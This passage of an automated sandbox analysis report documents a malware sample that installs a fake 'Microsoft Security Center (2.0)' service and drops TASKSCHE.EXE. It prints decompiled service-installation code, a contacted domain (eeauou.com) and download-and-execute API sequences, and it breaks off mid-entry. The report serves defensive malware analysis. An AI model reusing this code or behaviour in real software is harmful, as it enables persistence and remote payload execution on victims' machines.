                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                                                                                • API String ID: 883794535-1685824476
                                                                                                                                                • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                                                                                • Instruction ID: 61cbf47c03161470b9a8152189a942457e4fdba8ef220ec88e57bee4b30ae545
                                                                                                                                                • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                                                                                • Instruction Fuzzy Hash: 5871DE71504298BAEF319F28882EBDE7FADAF49310F15060CE89A9E181C7F45F41C769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemTime.KERNEL32(00AC7584), ref: 00AC389F
                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 00AC3911
                                                                                                                                                • InternetGetConnectedState.WININET(?,00000000), ref: 00AC392A
                                                                                                                                                • gethostbyname.WS2_32(0D278125), ref: 00AC396C
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00AC3981
                                                                                                                                                • ioctlsocket.WS2_32(?,8004667E), ref: 00AC399A
                                                                                                                                                • connect.WS2_32(?,?,00000010), ref: 00AC39B3
                                                                                                                                                • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00AC39C1
                                                                                                                                                • closesocket.WS2_32 ref: 00AC3A20
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                                                                                                                                                • String ID: eeauou.com
                                                                                                                                                • API String ID: 159131500-1932208585
                                                                                                                                                • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                                                                                • Instruction ID: 9d05e3045229420a453d3691130959bc2551b68939f3fa7e8d5028c798b6e9fc
                                                                                                                                                • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                                                                                • Instruction Fuzzy Hash: 0B41B032644249BAEF319F248C4AFA97BAEAF85710F05802DF949EE1C1D7F59F408760
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                                                                                                                                                0x00407c56
                                                                                                                                                0x00407c6e
                                                                                                                                                0x00407c72
                                                                                                                                                0x00407cd3
                                                                                                                                                0x00407c74
                                                                                                                                                0x00407ca7
                                                                                                                                                0x00407cab
                                                                                                                                                0x00407cb2
                                                                                                                                                0x00407cb9
                                                                                                                                                0x00407cb9
                                                                                                                                                0x00407cbc
                                                                                                                                                0x00407cc9
                                                                                                                                                0x00407cc9

                                                                                                                                                APIs
                                                                                                                                                • sprintf.MSVCRT ref: 00407C56
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                                                                                                                • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F61FB10,00000000), ref: 00407C9B
                                                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                                                                                                                • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                                                                                                                • API String ID: 3340711343-4063779371
                                                                                                                                                • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                                                                                • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                                                                                                                • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                                                                                • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                                                                                                                                                0x0040809f
                                                                                                                                                0x004080a5
                                                                                                                                                0x004080ab
                                                                                                                                                0x004080ae
                                                                                                                                                0x004080c9
                                                                                                                                                0x004080cb
                                                                                                                                                0x004080cd
                                                                                                                                                0x004080e8
                                                                                                                                                0x004080ea
                                                                                                                                                0x004080ec
                                                                                                                                                0x004080f1
                                                                                                                                                0x004080fa
                                                                                                                                                0x004080fa
                                                                                                                                                0x004080fd
                                                                                                                                                0x00408100
                                                                                                                                                0x00408105
                                                                                                                                                0x0040810e
                                                                                                                                                0x00408116
                                                                                                                                                0x0040811e
                                                                                                                                                0x00408130
                                                                                                                                                0x004080b0
                                                                                                                                                0x004080b8
                                                                                                                                                0x004080b8

                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                                                                • __p___argc.MSVCRT ref: 004080A5
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F61FB10,00000000,?,004081B2), ref: 004080DC
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                                                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                                                                                                                • String ID: mssecsvc2.0
                                                                                                                                                • API String ID: 4274534310-3729025388
                                                                                                                                                • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                                                                                • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                                                                                                                • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                                                                                • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                                                                                • String ID: C:,$\Device\PhysicalMemory
                                                                                                                                                • API String ID: 2985292042-1440550476
                                                                                                                                                • Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                                                                                • Instruction ID: 89bc292a39abda77eba81180b1336a71123f95df307fbb064623dea506d6362f
                                                                                                                                                • Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                                                                                • Instruction Fuzzy Hash: 5A817671500208FFEB218F14CC89ABA7BADEF44704F504658ED1A9F295D7F2AF458BA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AC344A
                                                                                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AC3469
                                                                                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AC3493
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AC34A0
                                                                                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00AC34B8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                                                                                • String ID: C:,$\Device\PhysicalMemory
                                                                                                                                                • API String ID: 2985292042-1440550476
                                                                                                                                                • Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                                                                                • Instruction ID: ab3470033767ba08252561c6da93687e3ae021c62f5515d8fcb40e39bd3fca3f
                                                                                                                                                • Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                                                                                • Instruction Fuzzy Hash: 41817871500208BFEB248F15CC89FAA3BBCEF44705F51861CED199B291D7F0AF458AA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                                                                                • String ID: C:,$ysic
                                                                                                                                                • API String ID: 2985292042-2852681185
                                                                                                                                                • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                                                                                • Instruction ID: 20dbb16ab5d0e33e58175ecc7424444a29ed84bf4ea1b595fcedbc50fe00d084
                                                                                                                                                • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                                                                                • Instruction Fuzzy Hash: D5115B74140608BFEB21CF10CC55FAA7A7DEF88704F50451CEA1A9E290EBF56F188A68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AC344A
                                                                                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AC3469
                                                                                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AC3493
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AC34A0
                                                                                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00AC34B8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                                                                                • String ID: C:,$ysic
                                                                                                                                                • API String ID: 2985292042-2852681185
                                                                                                                                                • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                                                                                • Instruction ID: 0a394d266af3059d0b7e8a43ae7c773aa28f9baead7ec7dc99eff1d737410276
                                                                                                                                                • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                                                                                • Instruction Fuzzy Hash: 15116D71140608BBEB24CF14DC59FEA367DEF88704F51851CEA199B290E7F46F148A69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC27A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00AC27A3,00000000,?), ref: 00AC27A8
                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AC27A3,00000000,?), ref: 00AC27C3
                                                                                                                                                • InternetReadFile.WININET(?,?,00000104), ref: 00AC27DD
                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27F3
                                                                                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27FF
                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AC27A3), ref: 00AC2823
                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00AC2833
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00AC283A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3452404049-0
                                                                                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                                                                                • Instruction ID: 4f75b582316cc80b2459c3936248e5078d11b2ab0a187313c3f79fd4682b5732
                                                                                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                                                                                • Instruction Fuzzy Hash: E7116DB1100606BBEB254B20CC8AFFB7A2DEF94B10F004519FA0699080DBF59E5196A8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA4C9E Relevance: 8.4, Strings: 6, Instructions: 887COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                                                                                • String ID: !$&$&$($@$nr
                                                                                                                                                • API String ID: 1961427682-1764398444
                                                                                                                                                • Opcode ID: 2381df1fe8655b0b15eefe916bab3e4e4fd8ee643c315c9c97763fa0453a1d75
                                                                                                                                                • Instruction ID: 4494a994f479d84deb6db3ff93facf62294d44c41ed5d8649dc2cc80e70bdf8a
                                                                                                                                                • Opcode Fuzzy Hash: 2381df1fe8655b0b15eefe916bab3e4e4fd8ee643c315c9c97763fa0453a1d75
                                                                                                                                                • Instruction Fuzzy Hash: 4D823232505309EFDB26CF28C4457B97BBAEF41328F105259D81A8F295D3B6AF94CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\axytVt), ref: 7FEA24BA
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 7FEA24C1
                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FEA2516
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 7FEA24B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 2597515329-2943719413
                                                                                                                                                • Opcode ID: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction ID: 36f5e8d8b616a1b6a077d728ef6f106cfb6906c53de1e66307b1d1f9a2e55959
                                                                                                                                                • Opcode Fuzzy Hash: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction Fuzzy Hash: A40181B0781344BAF7309B29CC4BF5F7929DF81B50F908558F608AE1C4DAB89A0483A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\axytVt), ref: 00AC24BA
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00AC24C1
                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00AC2516
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 00AC24B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 2597515329-2943719413
                                                                                                                                                • Opcode ID: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction ID: 00ec5dd88c16499f5e70d7096b6cb17fa9b88d584653376cddaf99cf016e6dec
                                                                                                                                                • Opcode Fuzzy Hash: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction Fuzzy Hash: 8A0181B0781304BAF7309B29CC4BF5F7929DF81B50F948558F608AE1C5DAB89A0483A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 7FEA254B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: OpenSection
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 1950954290-2943719413
                                                                                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA2574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 7FEA252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FEA25A4
                                                                                                                                                • CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FEA0815), ref: 7FEA25AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Section$CloseHandleOpenView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2731707328-0
                                                                                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                                                                                • Instruction ID: 3cc34a18b6b0f74ef45f64819b33cb598c6401d77195fbf03454f98489c8026e
